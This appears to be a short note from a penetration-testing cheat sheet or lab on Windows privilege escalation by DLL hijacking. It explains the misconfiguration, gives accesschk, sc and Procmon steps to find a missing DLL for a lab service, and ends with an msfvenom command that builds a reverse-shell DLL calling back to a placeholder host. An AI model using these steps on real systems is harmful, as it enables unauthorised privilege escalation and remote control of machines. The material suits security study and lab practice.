Often a service will try to load functionality from a library called a DLL (`dynamic-link library`). Whatever functionality the DLL provides, will be executed with the same privileges as the service that loaded it. If a DLL is loaded with an absolute path, it might be possible to escalate privileges if that DLL is writable by our user. A more common misconfiguration that can be used to escalate privileges is if a DLL is missing from the system, and our user has write access to a directory within the PATH that Windows searches for DLLs in. Unfortunately, initial detection of vulnerable services is difficult, and often the entire process is very manual. ```powershell # service start/stop accesschk.exe /accepteula -uvqc user dllsvc # check service sc qc dllsvc sc.exe qc dllsvc # Run procmon with Admin privileges to analyze the dll file Ctrl + L to open the filter configuration Process Name is dllhijackservice.exe # start service again # back in ProcMon, note "NAME NOT FOUND" errors associated with 'hijackme.dll' # create a reverse shell msfvenom -p windows/x64/shell_reverse_tcp LHOST=lhost LPORT=lport -f dll -o /tools/hijackme.dll ```